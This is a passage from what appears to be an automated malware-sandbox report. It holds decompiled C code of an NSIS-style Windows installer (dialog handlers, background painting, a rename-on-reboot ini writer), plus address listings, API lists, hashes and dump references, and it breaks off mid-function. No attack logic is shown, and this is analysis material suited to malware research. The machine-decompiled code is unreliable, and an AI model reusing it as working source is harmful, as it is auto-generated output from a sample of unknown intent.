									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403F18(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x423678, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42366c - _t133;
									if( *0x42366c != _t133) {
										goto L61;
									}
									ShowWindow( *0x423678, 8);
									E00403F64(0x405);
									goto L58;
								}
								__eflags =  *0x423f2c - _t133;
								if( *0x423f2c != _t133) {
									goto L61;
								}
								__eflags =  *0x423f20 - _t133;
								if( *0x423f20 != _t133) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x423678);
						 *0x423ea8 = _t133;
						EndDialog(_t125,  *0x41f868);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x423678, 0x40f, 0, 1);
						__eflags =  *0x42366c;
						return 0 |  *0x42366c == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x420478, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x420478,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403F7F(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x423678, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x423f2c - _t133;
										if( *0x423f2c == _t133) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x41f868 = 1;
											L21:
											_push(0x78);
											L22:
											E00403EF1();
											goto L26;
										}
										E0040140B(_t127);
										 *0x41f868 = _t127;
										goto L21;
									}
									__eflags =  *0x4091c4 - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x423678);
						 *0x423678 = _a12;
						L58:
						if( *0x4214a0 == _t133 &&  *0x423678 != _t133) {
							ShowWindow(_t125, 0xa);
							 *0x4214a0 = 1;
						}
						L61:
						return 0;
					}
				}
			}






























                                                                                    0x00403a4e
                                                                                    0x00403a57
                                                                                    0x00403b98
                                                                                    0x00403b9c
                                                                                    0x00403ba0
                                                                                    0x00403ba2
                                                                                    0x00403ba7
                                                                                    0x00403bb2
                                                                                    0x00403bbd
                                                                                    0x00403bc2
                                                                                    0x00403bc4
                                                                                    0x00403bc6
                                                                                    0x00403bc9
                                                                                    0x00403bce
                                                                                    0x00403bdc
                                                                                    0x00403be9
                                                                                    0x00403bf0
                                                                                    0x00403bf0
                                                                                    0x00403bf1
                                                                                    0x00403bf1
                                                                                    0x00403bf6
                                                                                    0x00403bfc
                                                                                    0x00403c03
                                                                                    0x00403c09
                                                                                    0x00403c0b
                                                                                    0x00403c4b
                                                                                    0x00403c50
                                                                                    0x00403c55
                                                                                    0x00403c55
                                                                                    0x00403c5a
                                                                                    0x00403c63
                                                                                    0x00403c65
                                                                                    0x00403c6a
                                                                                    0x00403c70
                                                                                    0x00403c74
                                                                                    0x00403c74
                                                                                    0x00403c79
                                                                                    0x00403c7f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403c8a
                                                                                    0x00403c90
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403c99
                                                                                    0x00403ca1
                                                                                    0x00403ca6
                                                                                    0x00403ca9
                                                                                    0x00403caf
                                                                                    0x00403cb4
                                                                                    0x00403cb7
                                                                                    0x00403cbd
                                                                                    0x00403cc2
                                                                                    0x00403cc5
                                                                                    0x00403ccb
                                                                                    0x00403cd3
                                                                                    0x00403cd9
                                                                                    0x00403cdf
                                                                                    0x00403ce3
                                                                                    0x00403cea
                                                                                    0x00403cea
                                                                                    0x00403cea
                                                                                    0x00403cf4
                                                                                    0x00403d06
                                                                                    0x00403d12
                                                                                    0x00403d17
                                                                                    0x00403d21
                                                                                    0x00403d27
                                                                                    0x00403d29
                                                                                    0x00403d2e
                                                                                    0x00403d2b
                                                                                    0x00403d2b
                                                                                    0x00403d2b
                                                                                    0x00403d3e
                                                                                    0x00403d56
                                                                                    0x00403d58
                                                                                    0x00403d5e
                                                                                    0x00403d73
                                                                                    0x00403d60
                                                                                    0x00403d69
                                                                                    0x00403d6b
                                                                                    0x00403d6b
                                                                                    0x00403d79
                                                                                    0x00403d89
                                                                                    0x00403d9a
                                                                                    0x00403da1
                                                                                    0x00403da7
                                                                                    0x00403dab
                                                                                    0x00403db0
                                                                                    0x00403db2
                                                                                    0x00000000
                                                                                    0x00403db8
                                                                                    0x00403db8
                                                                                    0x00403dba
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403dc0
                                                                                    0x00403dc4
                                                                                    0x00403de9
                                                                                    0x00403def
                                                                                    0x00403df5
                                                                                    0x00403df7
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403e1d
                                                                                    0x00403e23
                                                                                    0x00403e25
                                                                                    0x00403e2a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403e30
                                                                                    0x00403e33
                                                                                    0x00403e36
                                                                                    0x00403e4d
                                                                                    0x00403e59
                                                                                    0x00403e72
                                                                                    0x00403e78
                                                                                    0x00403e7c
                                                                                    0x00403e81
                                                                                    0x00403e87
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403e91
                                                                                    0x00403e9c
                                                                                    0x00000000
                                                                                    0x00403e9c
                                                                                    0x00403dc6
                                                                                    0x00403dcc
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403dd2
                                                                                    0x00403dd8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403dde
                                                                                    0x00403db2
                                                                                    0x00403ea9
                                                                                    0x00403eb5
                                                                                    0x00403ebc
                                                                                    0x00000000
                                                                                    0x00403c0d
                                                                                    0x00403c0d
                                                                                    0x00403c10
                                                                                    0x00403c43
                                                                                    0x00403c43
                                                                                    0x00403c45
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403c45
                                                                                    0x00403c12
                                                                                    0x00403c16
                                                                                    0x00403c1b
                                                                                    0x00403c1d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403c2d
                                                                                    0x00403c35
                                                                                    0x00000000
                                                                                    0x00403c3b
                                                                                    0x00403a69
                                                                                    0x00403a69
                                                                                    0x00403a6d
                                                                                    0x00403a72
                                                                                    0x00403a81
                                                                                    0x00403a81
                                                                                    0x00403a8a
                                                                                    0x00403a93
                                                                                    0x00403a9e
                                                                                    0x00403a9e
                                                                                    0x00403aaa
                                                                                    0x00403ac6
                                                                                    0x00403ac9
                                                                                    0x00403adc
                                                                                    0x00403ae2
                                                                                    0x00403b85
                                                                                    0x00000000
                                                                                    0x00403b8e
                                                                                    0x00403ae8
                                                                                    0x00403af5
                                                                                    0x00403af7
                                                                                    0x00403af9
                                                                                    0x00403b18
                                                                                    0x00403b18
                                                                                    0x00403b1b
                                                                                    0x00403b20
                                                                                    0x00403b23
                                                                                    0x00403b33
                                                                                    0x00403b34
                                                                                    0x00403b36
                                                                                    0x00403b6c
                                                                                    0x00403b7f
                                                                                    0x00000000
                                                                                    0x00403b7f
                                                                                    0x00403b38
                                                                                    0x00403b3e
                                                                                    0x00403b57
                                                                                    0x00403b5c
                                                                                    0x00403b5e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403b60
                                                                                    0x00403b4c
                                                                                    0x00403b4c
                                                                                    0x00403b4e
                                                                                    0x00403b4e
                                                                                    0x00000000
                                                                                    0x00403b4e
                                                                                    0x00403b41
                                                                                    0x00403b46
                                                                                    0x00000000
                                                                                    0x00403b46
                                                                                    0x00403b25
                                                                                    0x00403b2b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403b2d
                                                                                    0x00000000
                                                                                    0x00403b2d
                                                                                    0x00403b1d
                                                                                    0x00000000
                                                                                    0x00403b1d
                                                                                    0x00403b03
                                                                                    0x00403b0a
                                                                                    0x00403b10
                                                                                    0x00403b12
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403b12
                                                                                    0x00403ace
                                                                                    0x00000000
                                                                                    0x00403aac
                                                                                    0x00403ab2
                                                                                    0x00403abc
                                                                                    0x00403ec2
                                                                                    0x00403ec8
                                                                                    0x00403ed5
                                                                                    0x00403edb
                                                                                    0x00403edb
                                                                                    0x00403ee5
                                                                                    0x00000000
                                                                                    0x00403ee5
                                                                                    0x00403aaa

                                                                                    APIs
                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403A81
                                                                                    • ShowWindow.USER32(?), ref: 00403A9E
                                                                                    • DestroyWindow.USER32 ref: 00403AB2
                                                                                    • SetWindowLongA.USER32 ref: 00403ACE
                                                                                    • GetDlgItem.USER32 ref: 00403AEF
                                                                                    • SendMessageA.USER32 ref: 00403B03
                                                                                    • IsWindowEnabled.USER32(00000000), ref: 00403B0A
                                                                                    • GetDlgItem.USER32 ref: 00403BB8
                                                                                    • GetDlgItem.USER32 ref: 00403BC2
                                                                                    • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403BDC
                                                                                    • SendMessageA.USER32 ref: 00403C2D
                                                                                    • GetDlgItem.USER32 ref: 00403CD3
                                                                                    • ShowWindow.USER32(00000000,?), ref: 00403CF4
                                                                                    • EnableWindow.USER32(?,?), ref: 00403D06
                                                                                    • EnableWindow.USER32(?,?), ref: 00403D21
                                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403D37
                                                                                    • EnableMenuItem.USER32 ref: 00403D3E
                                                                                    • SendMessageA.USER32 ref: 00403D56
                                                                                    • SendMessageA.USER32 ref: 00403D69
                                                                                    • lstrlenA.KERNEL32(004204A0,?,004204A0,004236A0), ref: 00403D92
                                                                                    • SetWindowTextA.USER32(?,004204A0), ref: 00403DA1
                                                                                    • ShowWindow.USER32(?,0000000A), ref: 00403ED5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.239137393.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.239121682.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239186619.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239200738.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239305698.0000000000422000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239326419.0000000000429000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239341604.000000000042C000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 184305955-0
                                                                                    • Opcode ID: 14e7e0a8131732f9e150b36a7fce0cb21c204cb0cec2561e24870ec1d01c69b9
                                                                                    • Instruction ID: 1b558320748e03173a152966608fa9e4bba3452d5179f8dde3fdb5243a6fbb8a
                                                                                    • Opcode Fuzzy Hash: 14e7e0a8131732f9e150b36a7fce0cb21c204cb0cec2561e24870ec1d01c69b9
                                                                                    • Instruction Fuzzy Hash: 21C18071A04204BBDB216F21ED45E2B3E7DEB4970AF40053EF541B12E1C739AA42DB6E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00404060, Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 204windowstringCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 93%
                                                                                    			E00404060(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x420480 =  *0x420480 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403F7F(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x422e40;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_t40 =  &_v8; // 0x422e40
								ShellExecuteA(_a4, "open",  *_t40, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x423ea8, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x423ea8, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x420480 != 0) {
						goto L25;
					} else {
						_t112 =  *0x41fc70 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403F3A(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E004042EB();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t113 =  *( *0x42367c - 4 + _t113 * 4);
				}
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 +  *0x423ed8;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E0040402C;
				E00403F18(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403F18(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403F3A( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403F4D(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t86 =  *( *0x423eb0 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x41f464 =  *0x41f464 & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x420480 =  *0x420480 & 0x00000000;
				return 0;
			}

















                                                                                    0x00404070
                                                                                    0x00404196
                                                                                    0x004041f2
                                                                                    0x004041f6
                                                                                    0x004042cd
                                                                                    0x004042cf
                                                                                    0x004042cf
                                                                                    0x004042d5
                                                                                    0x004042d5
                                                                                    0x004042d8
                                                                                    0x00000000
                                                                                    0x004042df
                                                                                    0x00404204
                                                                                    0x00404206
                                                                                    0x00404210
                                                                                    0x0040421b
                                                                                    0x0040421e
                                                                                    0x00404221
                                                                                    0x0040422c
                                                                                    0x0040422f
                                                                                    0x00404236
                                                                                    0x00404244
                                                                                    0x0040425c
                                                                                    0x00404264
                                                                                    0x0040426f
                                                                                    0x0040427f
                                                                                    0x00404281
                                                                                    0x00404281
                                                                                    0x00404236
                                                                                    0x0040428b
                                                                                    0x00000000
                                                                                    0x00404296
                                                                                    0x0040429a
                                                                                    0x004042ab
                                                                                    0x004042ab
                                                                                    0x004042b1
                                                                                    0x004042bf
                                                                                    0x004042bf
                                                                                    0x00000000
                                                                                    0x004042c3
                                                                                    0x0040428b
                                                                                    0x004041a1
                                                                                    0x00000000
                                                                                    0x004041b5
                                                                                    0x004041bb
                                                                                    0x004041c1
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004041e6
                                                                                    0x004041e8
                                                                                    0x004041ed
                                                                                    0x00000000
                                                                                    0x004041ed
                                                                                    0x004041a1
                                                                                    0x00404076
                                                                                    0x00404079
                                                                                    0x0040407e
                                                                                    0x0040408f
                                                                                    0x0040408f
                                                                                    0x00404096
                                                                                    0x00404099
                                                                                    0x0040409b
                                                                                    0x004040a0
                                                                                    0x004040a9
                                                                                    0x004040af
                                                                                    0x004040bb
                                                                                    0x004040be
                                                                                    0x004040c7
                                                                                    0x004040cc
                                                                                    0x004040cf
                                                                                    0x004040d4
                                                                                    0x004040eb
                                                                                    0x004040f2
                                                                                    0x00404105
                                                                                    0x00404108
                                                                                    0x0040411d
                                                                                    0x00404124
                                                                                    0x00404129
                                                                                    0x0040412e
                                                                                    0x0040412e
                                                                                    0x0040413d
                                                                                    0x0040414c
                                                                                    0x0040414e
                                                                                    0x00404164
                                                                                    0x00404173
                                                                                    0x00404175
                                                                                    0x00000000

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.239137393.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.239121682.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239186619.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239200738.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239305698.0000000000422000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239326419.0000000000429000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239341604.000000000042C000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                    • String ID: @.B$N$open
                                                                                    • API String ID: 3615053054-3815657624
                                                                                    • Opcode ID: e8b988e3949f0b6d91b1b58256fef292242953983a672fd1ea6cb44b2e1e2ed0
                                                                                    • Instruction ID: 7761d7a6ce13443680711406d70bf9c6d022160e69bfd2fffc9b265f6460a43d
                                                                                    • Opcode Fuzzy Hash: e8b988e3949f0b6d91b1b58256fef292242953983a672fd1ea6cb44b2e1e2ed0
                                                                                    • Instruction Fuzzy Hash: 4661B2B1A40209BFEB109F60DC45F6A3B69FB44755F10817AFB04BA2D1C7B8A951CF98
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00401000, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 90%
                                                                                    			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x423eb0;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, 0x4236a0, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x423ea8;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}













                                                                                    0x0040100a
                                                                                    0x00401039
                                                                                    0x00401047
                                                                                    0x0040104d
                                                                                    0x00401051
                                                                                    0x0040105b
                                                                                    0x00401061
                                                                                    0x00401064
                                                                                    0x004010f3
                                                                                    0x00401089
                                                                                    0x0040108c
                                                                                    0x004010a6
                                                                                    0x004010bd
                                                                                    0x004010cc
                                                                                    0x004010cf
                                                                                    0x004010d5
                                                                                    0x004010d9
                                                                                    0x004010e4
                                                                                    0x004010ed
                                                                                    0x004010ef
                                                                                    0x004010ef
                                                                                    0x00401100
                                                                                    0x00401105
                                                                                    0x0040110d
                                                                                    0x00401110
                                                                                    0x00401112
                                                                                    0x00401118
                                                                                    0x0040111f
                                                                                    0x00401126
                                                                                    0x00401130
                                                                                    0x00401142
                                                                                    0x00401156
                                                                                    0x00401160
                                                                                    0x00401165
                                                                                    0x00401165
                                                                                    0x00401110
                                                                                    0x0040116e
                                                                                    0x00000000
                                                                                    0x00401178
                                                                                    0x00401010
                                                                                    0x00401013
                                                                                    0x00401015
                                                                                    0x0040101f
                                                                                    0x0040101f
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                                    • GetClientRect.USER32 ref: 0040105B
                                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                    • FillRect.USER32 ref: 004010E4
                                                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                                                    • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                    • DrawTextA.USER32(00000000,004236A0,000000FF,00000010,00000820), ref: 00401156
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.239137393.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.239121682.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239186619.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239200738.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239305698.0000000000422000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239326419.0000000000429000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239341604.000000000042C000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                    • String ID: F
                                                                                    • API String ID: 941294808-1304234792
                                                                                    • Opcode ID: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
                                                                                    • Instruction ID: 81477e3a2fde3fb3f26aa953fc06e347994717d76cab2c79682594c458f31f57
                                                                                    • Opcode Fuzzy Hash: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
                                                                                    • Instruction Fuzzy Hash: 8141BC71804249AFCB058FA4CD459BFBFB9FF44314F00802AF551AA1A0C378EA54DFA5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004058B4, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144filememoryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 93%
                                                                                    			E004058B4() {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405E88(1);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x423f30 =  *0x423f30 + 1;
						return _t20;
					}
				}
				 *0x422630 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x4220a8, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x421ca8, "%s=%s\r\n", 0x422630, 0x4220a8);
						_t56 = _t55 + 0x10;
						E00405B88(_t43, 0x400, 0x4220a8, 0x4220a8,  *((intOrPtr*)( *0x423eb0 + 0x128)));
						_t20 = E0040583D(0x4220a8, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E004057B2(_t51, "[Rename]\r\n") != 0) {
								_t28 = E004057B2(_t26 + 0xa, 0x409350);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E004057FE(_t51 + _t29, 0x421ca8, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E00405B66(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E0040583D(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x422630, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}





















                                                                                    0x004058ba
                                                                                    0x004058c1
                                                                                    0x004058c5
                                                                                    0x004058ce
                                                                                    0x004058d2
                                                                                    0x00405a11
                                                                                    0x00405a11
                                                                                    0x00000000
                                                                                    0x00405a11
                                                                                    0x004058d2
                                                                                    0x004058de
                                                                                    0x004058f4
                                                                                    0x0040591c
                                                                                    0x00405927
                                                                                    0x0040592b
                                                                                    0x0040594b
                                                                                    0x00405952
                                                                                    0x0040595c
                                                                                    0x00405969
                                                                                    0x0040596e
                                                                                    0x00405973
                                                                                    0x00405977
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405986
                                                                                    0x00405988
                                                                                    0x00405995
                                                                                    0x00405999
                                                                                    0x00405a0a
                                                                                    0x00405a0b
                                                                                    0x00000000
                                                                                    0x004059b5
